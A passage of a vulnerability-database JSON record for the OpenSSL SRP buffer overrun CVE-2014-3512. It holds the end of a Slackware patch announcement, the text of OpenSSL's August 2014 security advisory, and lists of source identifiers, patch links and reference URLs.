13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nOpenSSL 0.9.8 users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 users should upgrade to 1.0.1i. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. \n\n\nCrash with SRP ciphersuite in Server Hello message (CVE-2014-5139)\n==================================================================\n\nThe issue affects OpenSSL clients and allows a malicious server to crash\nthe client with a null pointer dereference (read) by specifying an SRP\nciphersuite even though it was not properly negotiated with the client. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nRace condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)\n==============================================================\n\nIf a multithreaded client connects to a malicious server using a resumed session\nand the server sends an ec point format extension it could write up to 255 bytes\nto freed memory. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. \n\n\nDouble Free when processing DTLS packets (CVE-2014-3505)\n========================================================\n\nAn attacker can force an error condition which causes openssl to crash whilst\nprocessing DTLS packets due to memory being freed twice. This can be exploited\nthrough a Denial of Service attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory exhaustion (CVE-2014-3506)\n======================================\n\nAn attacker can force openssl to consume large amounts of memory whilst\nprocessing DTLS handshake messages. This can be exploited through a Denial of\nService attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory leak from zero-length fragments (CVE-2014-3507)\n===========================================================\n\nBy sending carefully crafted DTLS packets an attacker could cause openssl to\nleak memory. This can be exploited through a Denial of Service attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. A malicious server can crash the client with a null\npointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and\nsending carefully crafted handshake messages. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\n\nOpenSSL TLS protocol downgrade attack (CVE-2014-3511)\n=====================================================\n\nA flaw in the OpenSSL SSL/TLS server code causes the server to negotiate\nTLS 1.0 instead of higher protocol versions when the ClientHello message is\nbadly fragmented. This allows a man-in-the-middle attacker to force a\ndowngrade to TLS 1.0 even if both the server and the client support a higher\nprotocol version, by modifying the client\u0027s TLS records. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nOpenSSL 1.0.1 SSL/TLS users should upgrade to 1.0.1i. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time", "sources": [ { "db": "NVD", "id": "CVE-2014-3512" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "BID", "id": "69083" }, { "db": "VULMON", "id": "CVE-2014-3512" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3512", "trust": 3.4 }, { "db": "BID", "id": "69083", "trust": 1.4 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "60810", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "61017", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "61171", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2014-06", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2014-003817", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-129", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10649", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-3512", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128214", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129721", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3512" }, { "db": "BID", "id": "69083" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-129" }, { "db": "NVD", "id": "CVE-2014-3512" } ] }, "id": "VAR-201408-0082", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.42424244 }, "last_update_date": "2024-07-23T19:27:34.786000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HPSBHF03293", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026amp;m=142660345230545\u0026amp;w=2" }, { "title": "1686997", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "title": "1682293", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "title": "Fix SRP buffer overrun vulnerability.", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4a23b12a031860253b58d503f296377ca076427b" }, { "title": "SRP buffer overrun (CVE-2014-3512)", "trust": 0.8, "url": "http://www.openssl.org/news/secadv_20140806.txt" }, { "title": "Huawei-SA-20141008-OpenSSL", "trust": 0.8, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "title": "[R1] OpenSSL Protocol Downgrade Vulnerability Affects Tenable Products", "trust": 0.8, "url": "http://www.tenable.com/security/tns-2014-06" }, { "title": "openssl-1.0.1i", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51696" }, { "title": "openssl-1.0.0n", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51695" }, { "title": "openssl-0.9.8zb", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51694" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3512" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "CNNVD", "id": "CNNVD-201408-129" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "NVD", "id": "CVE-2014-3512" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60810" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61171" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15565.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69083" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.tenable.com/security/tns-2014-06" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95158" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=4a23b12a031860253b58d503f296377ca076427b" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3512" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686126" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10649\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21715901" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15565.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683744" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4a23b12a031860253b58d503f296377ca076427b" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/vulnerabilities/http-openssl-cve-2014-3512" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35209" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512\u003e" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20140806.txt\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-14:18.openssl.asc\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch.asc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139\u003e" }, { "trust": 0.1, "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-5139" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3512" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3509" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6449" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3510" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3505" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": 